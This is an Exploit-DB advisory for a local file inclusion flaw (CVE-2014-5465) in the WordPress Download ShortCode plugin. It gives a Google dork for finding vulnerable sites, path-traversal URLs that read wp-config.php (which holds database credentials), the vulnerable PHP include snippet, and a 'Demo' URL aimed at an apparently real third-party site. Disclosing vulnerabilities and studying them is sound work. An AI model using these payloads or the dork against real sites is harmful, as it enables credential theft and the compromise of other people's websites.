WordPress Plugin ShortCode 0.2.3 - Local File Inclusion

Author: Mehdi Karout & Christian Galeone
type: webapps
platform: php
port: 
date_added: 2014-08-28 
date_updated: 2014-08-28 
verified: 1 
codes: CVE-2014-5465;OSVDB-110528 
tags: WordPress Plugin
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt34500/screen-shot-2014-08-28-at-143735.png 
application_url: http://www.exploit-db.comdownload-shortcode.1.1.zip

#################################################################################################
#
# Title                : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Severity             : High+/Critical
# Reporter(s)          : Mehdi Karout & Christian Galeone
# Google Dork          : inurl:wp/wp-content/force-download.php
# Plugin Version       : 0.2.3
# Plugin Name          : Download ShortCode
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
# Vendor Home          : http://werdswords.com/
# Date                 : 25/08/2014
# Tested in            : Win7 - Kali Linux
# CVE                  : CVE-2014-5465
#
##################################################################################################
#
# PoC :
#
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
#
# Exploit Code :
#
#    $file = $_GET['file'];
#  if(isset($file))
#  {
#      include("pages/$file");
#  }
#  else
#  {
#      include("index.php");
#  }
#
# Demo :
#
# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php
#
##################################################################################################